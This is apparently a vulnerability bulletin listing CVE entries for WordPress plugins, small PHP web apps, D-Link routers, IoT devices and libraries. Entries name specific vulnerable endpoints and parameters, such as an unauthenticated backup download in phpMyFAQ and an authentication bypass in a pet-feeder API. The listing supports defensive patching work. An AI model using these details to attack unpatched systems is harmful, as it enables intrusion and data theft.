| Peter Sterling--Simple Archive Generator | Cross-Site Request Forgery (CSRF) vulnerability in Peter Sterling Simple Archive Generator allows Stored XSS. This issue affects Simple Archive Generator: from n/a through 5.2. | 2025-12-31 | 7.1 | CVE-2025-49346 | https://vdp.patchstack.com/database/wordpress/plugin/simple-archive-generator/vulnerability/wordpress-simple-archive-generator-plugin-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Marcin Kijak--Noindex by Path | Cross-Site Request Forgery (CSRF) vulnerability in Marcin Kijak Noindex by Path allows Stored XSS. This issue affects Noindex by Path: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49353 | https://vdp.patchstack.com/database/wordpress/plugin/noindex-by-path/vulnerability/wordpress-noindex-by-path-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mindstien Technologies--Recent Posts From Each Category | Cross-Site Request Forgery (CSRF) vulnerability in Mindstien Technologies Recent Posts From Each Category allows Stored XSS. This issue affects Recent Posts From Each Category: from n/a through 1.4. | 2025-12-31 | 7.1 | CVE-2025-49354 | https://vdp.patchstack.com/database/wordpress/plugin/recent-posts-from-each-category/vulnerability/wordpress-recent-posts-from-each-category-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| nebelhorn--Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nebelhorn Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App allows Reflected XSS. This issue affects Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App: from n/a through 0.8.8.8. | 2025-12-31 | 7.1 | CVE-2025-50053 | https://vdp.patchstack.com/database/wordpress/plugin/yournewsapp/vulnerability/wordpress-blappsta-mobile-app-plugin-your-native-mobile-iphone-app-and-android-app-plugin-0-8-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| uxper--Sala | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxper Sala allows Reflected XSS. This issue affects Sala: from n/a through 1.1.3. | 2025-12-31 | 7.1 | CVE-2025-52739 | https://vdp.patchstack.com/database/wordpress/theme/sala/vulnerability/wordpress-sala-theme-1-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| osuthorpe--Easy Social | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osuthorpe Easy Social allows Reflected XSS. This issue affects Easy Social: from n/a through 1.3. | 2025-12-31 | 7.1 | CVE-2025-53235 | https://vdp.patchstack.com/database/wordpress/plugin/easy-social-media/vulnerability/wordpress-easy-social-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kopek Reem--ReKord client | CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | 2026-01-01 | 7.5 | CVE-2025-55065 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Appointify--Appointify | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection. This issue affects Appointify: from n/a through 1.0.8. | 2025-12-30 | 7.6 | CVE-2025-59129 | https://vdp.patchstack.com/database/wordpress/plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-sql-injection-vulnerability?_s_id=cve |
| Hoernerfranz--WP-CalDav2ICS | Cross-Site Request Forgery (CSRF) vulnerability in Hoernerfranz WP-CalDav2ICS allows Stored XSS. This issue affects WP-CalDav2ICS: from n/a through 1.3.4. | 2025-12-30 | 7.1 | CVE-2025-59131 | https://vdp.patchstack.com/database/wordpress/plugin/wp-caldav2ics/vulnerability/wordpress-wp-caldav2ics-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| eLEOPARD--Behance Portfolio Manager | Cross-Site Request Forgery (CSRF) vulnerability in eLEOPARD Behance Portfolio Manager allows Stored XSS. This issue affects Behance Portfolio Manager: from n/a through 1.7.5. | 2025-12-31 | 7.1 | CVE-2025-59137 | https://vdp.patchstack.com/database/wordpress/plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| MadrasThemes--MAS Videos | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MadrasThemes MAS Videos allows PHP Local File Inclusion. This issue affects MAS Videos: from n/a through 1.3.2. | 2025-12-30 | 7.5 | CVE-2025-62753 | https://vdp.patchstack.com/database/wordpress/plugin/masvideos/vulnerability/wordpress-mas-videos-plugin-1-3-2-local-file-inclusion-vulnerability?_s_id=cve |
| Emraan Cheema--CubeWP | Missing Authorization vulnerability in Emraan Cheema CubeWP allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects CubeWP: from n/a through 1.1.27. | 2025-12-29 | 7.5 | CVE-2025-68036 | https://vdp.patchstack.com/database/wordpress/plugin/cubewp-framework/vulnerability/wordpress-cubewp-plugin-1-1-27-broken-access-control-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. A Denial of Service (DoS) vulnerability in versions prior to 2.19.0 allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a "JavaScript heap out of memory" error due to unbounded in-memory storage of request objects. Version 2.19.0 fixes the issue. | 2026-01-01 | 7.5 | CVE-2025-68272 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| Plugin Optimizer--Plugin Optimizer | Missing Authorization vulnerability in Plugin Optimizer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Plugin Optimizer: from n/a through 1.3.7. | 2025-12-29 | 7.1 | CVE-2025-68861 | https://vdp.patchstack.com/database/wordpress/plugin/plugin-optimizer/vulnerability/wordpress-plugin-optimizer-plugin-1-3-7-broken-access-control-vulnerability?_s_id=cve |
| reDim GmbH--CookieHint WP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in reDim GmbH CookieHint WP allows PHP Local File Inclusion. This issue affects CookieHint WP: from n/a through 1.0.0. | 2025-12-29 | 7.5 | CVE-2025-68870 | https://vdp.patchstack.com/database/wordpress/plugin/cookiehint-wp/vulnerability/wordpress-cookiehint-wp-plugin-1-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| INVELITY--Invelity SPS connect | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in INVELITY Invelity SPS connect allows Reflected XSS. This issue affects Invelity SPS connect: from n/a through 1.0.8. | 2025-12-29 | 7.1 | CVE-2025-68876 | https://vdp.patchstack.com/database/wordpress/plugin/invelity-sps-connect/vulnerability/wordpress-invelity-sps-connect-plugin-1-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CedCommerce--CedCommerce Integration for Good Market | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CedCommerce CedCommerce Integration for Good Market allows PHP Local File Inclusion. This issue affects CedCommerce Integration for Good Market: from n/a through 1.0.6. | 2025-12-29 | 7.5 | CVE-2025-68877 | https://vdp.patchstack.com/database/wordpress/plugin/ced-good-market-integration/vulnerability/wordpress-cedcommerce-integration-for-good-market-plugin-1-0-6-local-file-inclusion-vulnerability?_s_id=cve |
| Prasadkirpekar--Advanced Custom CSS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasadkirpekar Advanced Custom CSS allows Reflected XSS. This issue affects Advanced Custom CSS: from n/a through 1.1.0. | 2025-12-29 | 7.1 | CVE-2025-68878 | https://vdp.patchstack.com/database/wordpress/plugin/advanced-custom-css/vulnerability/wordpress-advanced-custom-css-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Councilsoft--Content Grid Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Councilsoft Content Grid Slider allows Reflected XSS. This issue affects Content Grid Slider: from n/a through 1.5. | 2025-12-29 | 7.1 | CVE-2025-68879 | https://vdp.patchstack.com/database/wordpress/plugin/content-grid-slider/vulnerability/wordpress-content-grid-slider-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Page Carbajal--Custom Post Status | Cross-Site Request Forgery (CSRF) vulnerability in Page Carbajal Custom Post Status allows Stored XSS. This issue affects Custom Post Status: from n/a through 1.1.0. | 2025-12-31 | 7.1 | CVE-2025-68885 | https://vdp.patchstack.com/database/wordpress/plugin/custom-post-status/vulnerability/wordpress-custom-post-status-plugin-1-1-0-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. In versions prior to 4.0.16, an unauthenticated remote attacker can trigger generation of a configuration backup ZIP via `POST /api/setup/backup` and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., `database.php` with database credentials), leading to high-impact information disclosure and potential follow-on compromise. Version 4.0.16 fixes the issue. | 2025-12-29 | 7.5 | CVE-2025-69200 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg https://github.com/thorsten/phpMyFAQ/commit/b0e99ee3695152115841cb546d8dce64ceb8c29a |
| coturn--coturn | coturn is a free open source implementation of TURN and STUN Server. Versions 4.6.2r5 through 4.7.0-r4 have a bad random number generator for nonces and port randomization after refactoring. Additionally, random numbers aren't generated with openssl's RAND_bytes but libc's random() (if it's not running on Windows). When fetching about 50 sequential nonces (i.e., through sending 50 unauthenticated allocations requests) it is possible to completely reconstruct the current state of the random number generator, thereby predicting the next nonce. This allows authentication while spoofing IPs. An attacker can send authenticated messages without ever receiving the responses, including the nonce (requires knowledge of the credentials, which is e.g., often the case in IoT settings). Since the port randomization is deterministic given the pseudorandom seed, an attacker can exactly reconstruct the ports and, hence predict the randomization of the ports. If an attacker allocates a relay port, they know the current port, and they are able to predict the next relay port (at least if it is not used before). Commit 11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 contains a fix. | 2025-12-30 | 7.7 | CVE-2025-69217 | https://github.com/coturn/coturn/security/advisories/GHSA-fvj6-9jhg-9j84 https://github.com/coturn/coturn/commit/11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 https://github.com/coturn/coturn/commit/88ced471385869d7e7fbbc4766e78ef521b36af6 |
| serverless--serverless | The Serverless Framework is a framework for using AWS Lambda and other managed cloud services to build applications. Starting in version 4.29.0 and prior to version 4.29.3, a command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). Version 4.29.3 fixes the issue. | 2025-12-30 | 7.5 | CVE-2025-69256 | https://github.com/serverless/serverless/security/advisories/GHSA-rwc2-f344-q6w6 https://github.com/serverless/serverless/commit/681ca039550c7169369f98780c6301a00f2dc4c4 https://github.com/serverless/serverless/blob/6213453da7df375aaf12fb3522ab8870488fc59a/packages/mcp/src/tools/list-projects.js#L68 https://github.com/serverless/serverless/releases/tag/sf-core%404.29.3 |
| Plex--Media Server | In Plex Media Server (PMS) through 1.42.2.10156, ability to access /myplex/account with a device token is not properly aligned with whether the device is currently associated with an account. | 2026-01-02 | 7.1 | CVE-2025-69415 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| itsourcecode--School Management System | A security flaw has been discovered in itsourcecode School Management System 1.0. This affects an unknown part of the file /student/index.php. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-01 | 7.3 | CVE-2026-0544 | VDB-339331 | itsourcecode School Management System index.php sql injection VDB-339331 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728909 | itsourcecode School Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/31 https://itsourcecode.com/ |
| code-projects--Content Management System | A vulnerability was determined in code-projects Content Management System 1.0. This impacts an unknown function of the file search.php. This manipulation of the argument Value causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-02 | 7.3 | CVE-2026-0546 | VDB-339338 | code-projects Content Management System search.php sql injection VDB-339338 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728924 | Code-projects Content Management System v1.0 SQL Injection https://github.com/gtxy114514/CVE/issues/1 https://code-projects.org/ |
| code-projects--Content Management System | A weakness has been identified in code-projects Content Management System 1.0. This issue affects some unknown processing of the file /admin/delete.php. Executing manipulation of the argument del can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-02 | 7.3 | CVE-2026-0565 | VDB-339377 | code-projects Content Management System delete.php sql injection VDB-339377 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729227 | Code-projects Content Management System v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/12 https://code-projects.org/ |
| code-projects--Content Management System | A vulnerability was detected in code-projects Content Management System 1.0. The affected element is an unknown function of the file /pages.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-01-02 | 7.3 | CVE-2026-0567 | VDB-339379 | code-projects Content Management System pages.php sql injection VDB-339379 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729229 | Code-projects Content Management System v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/14 https://code-projects.org/ |
| code-projects--Online Music Site | A flaw has been found in code-projects Online Music Site 1.0. The impacted element is an unknown function of the file /Frontend/ViewSongs.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-01-02 | 7.3 | CVE-2026-0568 | VDB-339380 | code-projects Online Music Site ViewSongs.php sql injection VDB-339380 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729251 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/15 https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability has been found in code-projects Online Music Site 1.0. This affects an unknown function of the file /Frontend/AlbumByCategory.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-01-02 | 7.3 | CVE-2026-0569 | VDB-339381 | code-projects Online Music Site AlbumByCategory.php sql injection VDB-339381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729252 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/16 https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was found in code-projects Online Music Site 1.0. This impacts an unknown function of the file /Frontend/Feedback.php. Performing manipulation of the argument fname results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-01-02 | 7.3 | CVE-2026-0570 | VDB-339382 | code-projects Online Music Site Feedback.php sql injection VDB-339382 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729253 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/18 https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security vulnerability has been detected in code-projects Online Product Reservation System 1.0. This impacts an unknown function of the file /handgunner-administrator/adminlogin.php of the component Administrator Login. Such manipulation of the argument emailadd/pass leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-01-04 | 7.3 | CVE-2026-0575 | VDB-339459 | code-projects Online Product Reservation System Administrator Login adminlogin.php sql injection VDB-339459 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731011 | code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_login.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_login.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was detected in code-projects Online Product Reservation System 1.0. Affected is an unknown function of the file /handgunner-administrator/prod.php of the component Parameter Handler. Performing manipulation of the argument cat/price/name/model/serial results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-04 | 7.3 | CVE-2026-0576 | VDB-339460 | code-projects Online Product Reservation System Parameter prod.php sql injection VDB-339460 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731012 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_add_prod.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_add_prod.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability has been found in code-projects Online Product Reservation System 1.0. Affected by this issue is some unknown functionality of the file /handgunner-administrator/delete.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-01-04 | 7.3 | CVE-2026-0578 | VDB-339462 | code-projects Online Product Reservation System delete.php sql injection VDB-339462 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731075 | code-projects Online Product Reservation system in PHP with source code V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_delete.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_delete.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was found in code-projects Online Product Reservation System 1.0. This affects an unknown part of the file /handgunner-administrator/edit.php of the component POST Parameter Handler. The manipulation of the argument prod_id/name/price/model/serial results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-01-04 | 7.3 | CVE-2026-0579 | VDB-339463 | code-projects Online Product Reservation System POST Parameter edit.php sql injection VDB-339463 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731091 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_edit.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_edit.php.md#poc https://code-projects.org/ |
| emlog--emlog | Emlog is an open source website building system. Versions up to and including 2.5.19 are vulnerable to server-side Out-of-Band (OOB) requests / SSRF via uploaded SVG files. An attacker can upload a crafted SVG to http[:]//emblog/admin/media[.]php which contains external resource references. When the server processes/renders the SVG (thumbnailing, preview, or sanitization), it issues an HTTP request to the attacker-controlled host. Impact: server-side SSRF/OOB leading to internal network probing and potential metadata/credential exposure. As of time of publication, no known patched versions are available. | 2026-01-02 | 7.7 | CVE-2026-21433 | https://github.com/emlog/emlog/security/advisories/GHSA-6rwr-c8hc-mjj4 |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. Prior to version 2.3.10, an Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud. Version 2.3.10 patches the issue. | 2026-01-02 | 7.1 | CVE-2026-21447 | https://github.com/bagisto/bagisto/security/advisories/GHSA-x5rw-qvvp-5cgm https://github.com/bagisto/bagisto/commit/b2b1cf62577245d03a68532478cffbe321df74d3 |
| msgpack--msgpack-java | MessagePack for Java is a serializer implementation for Java. A denial-of-service vulnerability exists in versions prior to 0.9.11 when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation. The vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems. Version 0.9.11 fixes the vulnerability. | 2026-01-02 | 7.5 | CVE-2026-21452 | https://github.com/msgpack/msgpack-java/security/advisories/GHSA-cw39-r4h6-8j3x https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| COMMAX Co., Ltd.--COMMAX Biometric Access Control System | COMMAX Biometric Access Control System 1.0.0 contains an unauthenticated reflected cross-site scripting vulnerability in cookie parameters 'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM'. Attackers can inject malicious HTML and JavaScript code into these cookie values to execute arbitrary scripts in a victim's browser session. | 2025-12-31 | 6.1 | CVE-2021-47743 | Zero Science Lab Disclosure (ZSL-2021-5660) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry Vendor Homepage VulnCheck Advisory: COMMAX Biometric Access Control System 1.0.0 Reflected XSS via Cookie Parameters |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain hardcoded credentials embedded in server binaries that cannot be modified through normal device operations. Attackers can leverage these static credentials to gain unauthorized access to the device across Linux and Windows distributions without requiring user interaction. | 2025-12-30 | 6.5 | CVE-2022-50696 | Zero Science Lab Disclosure (ZSL-2022-5729) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Hardcoded Credentials Authentication Bypass |
| ETAP Lighting International NV--ETAP Safety Manager | ETAP Safety Manager 1.0.0.32 contains a cross-site scripting vulnerability in the 'action' GET parameter that allows unauthenticated attackers to inject malicious HTML and JavaScript. Attackers can craft specially formed requests to execute arbitrary scripts in victim browser sessions, potentially stealing credentials or performing unauthorized actions. | 2025-12-30 | 6.1 | CVE-2022-50802 | Zero Science Lab Disclosure (ZSL-2022-5711) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database ETAP Vendor Homepage VulnCheck Advisory: ETAP Safety Manager 1.0.0.32 Unauthenticated Reflected Cross-Site Scripting via Action Parameter |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to cross-site request forgery (CSRF) attacks, allowing attackers to perform administrative actions on behalf of authenticated users without their knowledge or consent. | 2025-12-30 | 6.5 | CVE-2022-50804 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Cross-Site Request Forgery (CSRF) Vulnerability |
| smackcoders--WP Import Ultimate CSV XML Importer for WordPress | The WP Import - Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.35. This is due to inadequate validation of the resolved URL after following Bitly shortlink redirects in the `upload_function()` method. While the initial URL is validated using `wp_http_validate_url()`, when a Bitly shortlink is detected, the `unshorten_bitly_url()` function follows redirects to the final destination URL without re-validating it. This makes it possible for authenticated attackers with Contributor-level access or higher to make the server perform HTTP requests to arbitrary internal endpoints, including localhost, private IP ranges, and cloud metadata services (e.g., 169.254.169.254), potentially exposing sensitive internal data. | 2026-01-01 | 6.4 | CVE-2025-14627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/87040f2b-4de0-4a8d-ae30-b340638a6df2?source=cve https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L73 https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L290 https://plugins.trac.wordpress.org/changeset/3421699/wp-ultimate-csv-importer/trunk/uploadModules/UrlUpload.php |
| Rapid7--Velociraptor | Rapid7 Velociraptor versions before 0.75.6 contain a directory traversal issue on Linux servers that allows a rogue client to upload a file which is written outside the datastore directory. Velociraptor is normally only allowed to write in the datastore directory. The issue occurs due to insufficient sanitization of directory names which end with a ".", only encoding the final "." as "%2E". Although files can be written to incorrect locations, the containing directory must end with "%2E". This limits the impact of this vulnerability, and prevents it from overwriting critical files. | 2025-12-29 | 6.8 | CVE-2025-14728 | https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/ |
| Kings Information & Network Co.--KESS Enterprise | Exposure of Sensitive Information to an Unauthorized Actor, Missing Encryption of Sensitive Data, Files or Directories Accessible to External Parties vulnerability in Kings Information & Network Co. KESS Enterprise on Windows allows Privilege Escalation, Modify Existing Service, Modify Shared File. This issue affects KESS Enterprise: before *.25.9.19.exe | 2025-12-29 | 6.3 | CVE-2025-15065 | https://www.kings.co.kr/solution/01/KESS.jsp?O=10.64&B=Chrome |
| Innorix--Innorix WP | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Missing Authorization vulnerability in Innorix WP allows Path Traversal. This issue affects Innorix WP: all versions, if the "exam" directory exists under the directory where the product is installed (e.g. innorix/exam). | 2025-12-29 | 6.2 | CVE-2025-15066 | https://www.innorix.com/ https://www.gnit.co.kr/software/innorix_product.html |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contain an authentication bypass vulnerability that allows unauthenticated attackers to access any user account by exploiting OAuth token validation flaws in the social login system. Attackers can send requests to /member/auth/thirdLogin with arbitrary Google IDs and phoneBrand parameters to obtain full session tokens and account access without proper OAuth verification. | 2026-01-03 | 6.5 | CVE-2025-15115 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Authentication Bypass via API endpoint |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_4155B4 of the file /boafrm/formLtefotaUpgradeFibocom. This manipulation of the argument fota_url causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 6.3 | CVE-2025-15191 | VDB-338576 | D-Link DWR-M920 formLtefotaUpgradeFibocom sub_4155B4 command injection VDB-338576 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723554 | D-Link DWR-M920 V1.1.50 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeFibocom.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeFibocom.md#poc https://www.dlink.com/ |
| D-Link--DWR-M920 | A security vulnerability has been detected in D-Link DWR-M920 up to 1.1.50. The impacted element is the function sub_415328 of the file /boafrm/formLtefotaUpgradeQuectel. Such manipulation of the argument fota_url leads to command injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15192 | VDB-338577 | D-Link DWR-M920 formLtefotaUpgradeQuectel sub_415328 command injection VDB-338577 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723555 | D-Link DWR-M920 V1.1.50 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeQuectel.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeQuectel.md#poc https://www.dlink.com/ |
| code-projects--College Notes Uploading System | A security vulnerability has been detected in code-projects College Notes Uploading System 1.0. Impacted is an unknown function of the file /dashboard/userprofile.php. The manipulation of the argument image leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15199 | VDB-338586 | code-projects College Notes Uploading System userprofile.php unrestricted upload VDB-338586 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724794 | Code-projects College Notes Uploading System v1.0 Arbitrary file upload vulnerability https://github.com/jjjjj-zr/jjjjjzr18/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /download.php. The manipulation of the argument istore_id leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-29 | 6.3 | CVE-2025-15205 | VDB-338592 | code-projects Student File Management System download.php sql injection VDB-338592 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724818 | Code-Projects Student File Management System V1.0 SQL Injection Vulnerability https://github.com/Bai-public/CVE/issues/4 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown part of the file /home/editfood.php. This manipulation of the argument a/b/c/d causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 6.3 | CVE-2025-15209 | VDB-338594 | code-projects Refugee Food Management System editfood.php sql injection VDB-338594 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722803 | code-projects Refugee Food Management System 1.0 SQL Injection Submit #724713 | Code-projects Refugee Food Management System v1.0 SQL injection (Duplicate) https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editfood.php.md https://code-projects.org/ |
